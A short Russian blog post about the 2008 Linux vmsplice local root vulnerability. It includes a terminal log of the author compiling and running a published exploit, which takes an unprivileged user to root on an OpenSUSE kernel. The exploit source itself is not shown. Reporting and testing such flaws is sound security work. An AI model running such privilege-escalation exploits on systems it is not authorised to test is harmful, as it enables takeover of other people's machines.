Локальный Root на Linux
Сегодня ночью (или вчера) в сети появился код эксплоита для получения локального рута. Насколько я знаю, то уязвимости подвержены ядра c 2.6.17. На сегодняшний день выпущено ядро 2.6.24.2, в котором уязвимость уже профиксена. Получить рута от простого пользователя не сложно, имея код эксплоита, что и было проверено мной на машине:
wert2all@wert2all:~/tmp/exploid> uname -a
Linux wert2all 2.6.22.16-0.2-default #1 SMP 2008/02/01 19:36:55 UTC x86_64 x86_64 x86_64 GNU/Linux
wert2all@wert2all:~/tmp/exploid> gcc local_root.c -o local-root
wert2all@wert2all:~/tmp/exploid> ./local-root
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b260abaf000 .. 0x2b260abe1000
[+] root
wert2all:~/tmp/exploid # whoami
root
wert2all:~/tmp/exploid #
Это печально, даже если учесть, что у некоторых он не срабатывает с первого раза. Пока апдейта для OpenSuSE нет, но после такого должно выйти быстренько.